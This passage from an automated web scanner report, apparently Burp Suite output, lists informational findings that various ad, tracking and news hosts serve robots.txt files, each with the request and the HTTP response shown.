Host: idgenterprise.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:18 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "35ca0e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www50
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.42. http://images.google.com/support/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.google.com
Path:	/support/bin/answer.py

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 14:00:23 GMT
Expires: Sun, 04 Sep 2011 14:00:23 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.43. http://jlinks.industrybrains.com/jsct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 12:15:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 12:15:57 GMT
Content-Length: 26

User-agent: *
Disallow: /

22.44. http://kaplab.netmng.com/pixel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kaplab.netmng.com
Path:	/pixel/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: kaplab.netmng.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:18:47 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 22 Nov 2010 16:01:30 GMT
ETag: "62573-1a-495a65e892a80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.45. http://kaspersky.ugc.bazaarvoice.com/8811/2000014/reviews.djs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kaspersky.ugc.bazaarvoice.com
Path:	/8811/2000014/reviews.djs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: kaspersky.ugc.bazaarvoice.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=ISO-8859-1
Date: Sun, 04 Sep 2011 12:24:40 GMT
Content-Length: 132
Connection: close

User-agent: *
Disallow: /bvs
Disallow: /rev
Disallow: /log
Disallow: /logging
Disallow: /logging?*

User-agent: kalooga
Disallow: /

22.46. http://l.addthiscdn.com/live/t00/152lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/152lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 12:15:36 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

22.47. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Fri, 19 Aug 2011 17:48:38 GMT
Accept-Ranges: bytes
ETag: "09f8539985ecc1:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 12:17:28 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

22.48. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 11:22:53 GMT
Expires: Mon, 05 Sep 2011 11:22:53 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 3148

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.49. http://pixel.invitemedia.com/adnxs_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/adnxs_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 12:19:21 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.50. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x79ea 31210
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

22.51. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 12:14:27 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 12:14:27 GMT
Server: QS

User-agent: *
Disallow: /

22.52. http://pto.digitalriver.com/trial/646/p/kaspersky_us_storepage.962/15/content.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pto.digitalriver.com
Path:	/trial/646/p/kaspersky_us_storepage.962/15/content.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pto.digitalriver.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1394696954"
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Content-Length: 26
Server: Fast
Expires: Sun, 04 Sep 2011 12:25:17 GMT
Pragma: no-cache
Date: Sun, 04 Sep 2011 12:25:17 GMT
Connection: close

User-agent: *
Disallow: /

22.53. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 12:19:01 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.54. http://rotation.linuxnewmedia.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rotation.linuxnewmedia.com
Path:	/www/delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rotation.linuxnewmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:46 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Wed, 08 Apr 2009 14:18:34 GMT
ETag: "208c3c-17a-4670bce858280"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

22.55. http://s0.2mdn.net/3130214/talarix3.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/3130214/talarix3.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 12:14:07 GMT
Expires: Mon, 05 Sep 2011 12:14:07 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

22.56. http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: searchsecurity.techtarget.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:45 GMT
Server: Apache-Coyote/1.1
ETag: W/"529-1314646750000"
Last-Modified: Mon, 29 Aug 2011 19:39:10 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 529
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Keep-Alive: timeout=5
Connection: close

User-agent: *
Disallow:/*?*src=
Disallow:/*?*offer=
Disallow:/*?*Offer=
Disallow:/*?*int=
Disallow:/*?*track=
Disallow:/*?*Track=
Disallow:/*?*asrc=
Disallow:/*?*ad=
Disallow:/*_idx*
Disallow:/*db
...[SNIP]...

22.57. http://spe.atdmt.com/ds/AAAASADTSADT/072711_ADT_Resi_99Hispanic/072611_ADT_Resi_99Hispanic_300x250.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/ds/AAAASADTSADT/072711_ADT_Resi_99Hispanic/072611_ADT_Resi_99Hispanic_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Sat, 10 Sep 2011 00:13:36 GMT
Date: Sun, 04 Sep 2011 12:15:18 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

22.58. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: store.digitalriver.com

Response

HTTP/1.1 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Connection: close
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=0+0;age=0;ecid=101162335339,0)
Content-Length: 73
Date: Thu, 05 May 2011 20:25:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app91
Accept-Ranges: bytes

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

22.59. http://support.kasperskyamericas.com/corporate/contact-information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/contact-information

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: support.kasperskyamericas.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:56:06 GMT
Server: Apache
Vary: Cookie
Last-Modified: Mon, 06 Sep 2010 10:37:16 GMT
ETag: "624-48f94dd34cf00"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 13:56:06 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

22.60. http://t.widgetserver.com/t/image.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.widgetserver.com
Path:	/t/image.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.widgetserver.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"26-1312314965000"
Last-Modified: Tue, 02 Aug 2011 19:56:05 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 12:17:16 GMT
Connection: close

User-agent: *
Disallow: /

22.61. http://tag.admeld.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "908203-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 04 Sep 2011 12:47:44 GMT
Connection: close

User-agent: *
Disallow: /

22.62. http://techtarget-www.baynote.net/baynote/tags3/common previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://techtarget-www.baynote.net
Path:	/baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: techtarget-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1315137002000"
Last-Modified: Sun, 04 Sep 2011 11:50:02 GMT
Content-Type: text/plain
Content-Length: 216
Date: Sun, 04 Sep 2011 12:15:09 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

22.63. http://themes.googleusercontent.com/image previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://themes.googleusercontent.com
Path:	/image

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 12:57:25 GMT
Expires: Sun, 04 Sep 2011 12:57:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

22.64. http://tr1.kaspersky.com/b/ss/kaspersky-usa/1/H.22.1/s25216629169881 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr1.kaspersky.com
Path:	/b/ss/kaspersky-usa/1/H.22.1/s25216629169881

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tr1.kaspersky.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:19:28 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "3420b1-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www74
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.65. http://usa.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usa.kaspersky.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:07:01 GMT
ETag: "31082f5-49-4948bf9e8ef40"
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 12:16:20 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 73
Date: Sun, 04 Sep 2011 12:17:53 GMT
X-Varnish: 1163042583 1163039953
Age: 92
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT

User-agent: *
Disallow:

Sitemap: http://usa.kaspersky.com/sitemap.xml

22.66. http://users.techtarget.com/registration/searchsecurity/InlineRegister.page previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/InlineRegister.page

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: users.techtarget.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "E45m7dih85d"
Last-Modified: Wed, 22 Jun 2011 18:10:48 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 64
Date: Sun, 04 Sep 2011 12:14:56 GMT

# all web spiders - block whole site

User-agent: *
Disallow: /

22.67. http://www.blogger.com/dyn-css/authorization.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blogger.com
Path:	/dyn-css/authorization.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogger.com

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 13:43:04 GMT
Date: Sun, 04 Sep 2011 12:43:04 GMT
Last-Modified: Tue, 30 Aug 2011 20:19:05 GMT
Content-Type: text/plain
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Age: 741
Cache-Control: public, max-age=3600

# robots.txt for http://www.blogger.com

User-agent: *
Disallow: /profile-find.g
Disallow: /comment.g
Disallow: /email-post.g
Disallow: /share-post-menu.g

22.68. http://www.cloudscan.me/2010/12/usakaperskycom-cross-site-scripting-xss.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudscan.me
Path:	/2010/12/usakaperskycom-cross-site-scripting-xss.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cloudscan.me

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Sun, 04 Sep 2011 12:55:10 GMT
Date: Sun, 04 Sep 2011 12:55:10 GMT
Cache-Control: private, max-age=86400
Last-Modified: Sun, 04 Sep 2011 12:37:40 GMT
ETag: "e8b18e41-1136-4831-a7fa-6a54ef8fa169"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search

Sitemap: http://www.cloudscan.me/feeds/posts/default?orderby=updated

22.69. http://www.computerworld.com/resources/styles/general.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/resources/styles/general.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.computerworld.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 28 Mar 2011 14:44:29 GMT
ETag: "169bb9-235-49f8bfb1b8d40"
Server: Apache/2.2.3 (CentOS)
Cteonnt-Length: 565
Cneonction: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=600
Date: Sun, 04 Sep 2011 12:15:49 GMT
Content-Length: 565
Connection: close

# robots.txt
# disallow blogs directories that shouldn't be spidered - May 2, 2007 (kgerich)

User-agent: *
Crawl-delay: 10
Disallow: /news/xml # old redirects...don't want spiders following the
...[SNIP]...

22.70. http://www.etracker.de/cnt.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.etracker.de
Path:	/cnt.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.etracker.de

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
ETag: "20b41b-98-4aa13752fa580"
Accept-Ranges: bytes
Content-Length: 152
Date: Sun, 04 Sep 2011 12:15:34 GMT
Connection: close
Last-Modified: Tue, 09 Aug 2011 14:34:14 GMT
Server: Apache
Content-Type: text/plain
Keep-Alive: timeout=5, max=100

User-agent: *
Disallow: /adm/
Disallow: /bin/
Disallow: /dcache/
Disallow: /inc/
Disallow: /reports/
Disallow: /skin/
Disallow: /wap/
Disallow: /rdirect

22.71. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.62.172.31
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.72. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 04 Sep 2011 12:13:07 GMT
Expires: Sun, 04 Sep 2011 12:13:07 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

22.73. http://www.googleadservices.com/pagead/conversion/1049525132/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1049525132/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 12:19:43 GMT
Expires: Sun, 04 Sep 2011 12:19:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.74. http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.h-online.com
Path:	/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.h-online.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:59 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 12:51:58 GMT
ETag: "724-4805821b79780"
Accept-Ranges: bytes
Content-Length: 1828
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Revision: 3932 $
User-agent: MS Search 4.0 Robot
Disallow: /

User-agent: *
# Misc.
Disallow: /RealMedia/
Disallow: /advertisement/
Disallow: /bin/
Disallow: /fastbin/
Disallow: /icons/
Disallow: /
...[SNIP]...

22.75. http://www.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaspersky.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=iso-8859-1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Showed: kaspen:kav:kavxrub=207716678
P3P: CP="IDC DSP COR LAW CUR DEV TAIo PSA PSD IVDi CONi OUR DEL IND PUR NAV OTC", policyref="/w3c/p3p.xml"
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 12:17:09 GMT
Connection: close
Content-Length: 25

User-agent: *
Disallow:

22.76. http://www.lexjansen.com/virus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lexjansen.com
Path:	/virus/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lexjansen.com

Response

HTTP/1.1 200 OK
Content-Length: 363
Content-Type: text/plain
Content-Location: http://www.lexjansen.com/robots.txt
Last-Modified: Thu, 14 Oct 2010 21:41:47 GMT
Accept-Ranges: bytes
ETag: "b21f139ae86bcb1:4d2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 13:54:49 GMT
Connection: close

# /robots.txt file for http://lexjansen.com/

User-agent: *
Allow: /
Disallow: /fortune/mp3/
Disallow: /jukebox/
Disallow: /marsh/mp3/
Disallow: /house/
Disallow: /temp/
Disallow: /test/
Disallow: /st
...[SNIP]...

22.77. http://www.linkedin.com/countserv/count/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/countserv/count/share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-781835069"
Last-Modified: Wed, 06 Apr 2011 03:23:38 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 12:12:55 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

22.78. http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazine.com.au
Path:	/News/268907,kaspersky-website-vulnerable-to-xss.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scmagazine.com.au

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Nov 2010 00:48:59 GMT
Accept-Ranges: bytes
ETag: "80f5564382cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:12:55 GMT
Connection: close
Content-Length: 23

User-agent: *
Allow: /

22.79. http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spamfighter.com
Path:	/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spamfighter.com

Response

HTTP/1.0 200 OK
Content-Length: 2626
Content-Type: text/plain
Last-Modified: Fri, 12 Aug 2011 10:52:34 GMT
Accept-Ranges: bytes
ETag: "bbda7ff1dd58cc1:2e0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:12:56 GMT
Connection: close

User-agent: *

# ==========
# = GLOBAL =
# ==========
# Last edit KF 12-08-2011

# GLOBAL: /FAQ elements
# -----------------------------------------------------------------
Disallow:/Dynami
...[SNIP]...

22.80. http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/news-events/114520/kaspersky-website-vulnerable-to-xss.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whatisnetwork.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:54:57 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain

Sitemap: http://www.whatisnetwork.com/sitemap.xml
User-agent: *
Disallow: *?replytocom
Disallow: /wp-content/cache/
Disallow: /wp-content/themes/
Disallow: /wp-content/plugins/
Disallow: /wp-adm
...[SNIP]...

22.81. http://www.widgetserver.com/syndication/get_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.widgetserver.com
Path:	/syndication/get_widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.widgetserver.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:16:56 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 10 Aug 2011 23:39:52 GMT
ETag: "1a-4aa2f325d4200"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
X-WBX: wsynd01
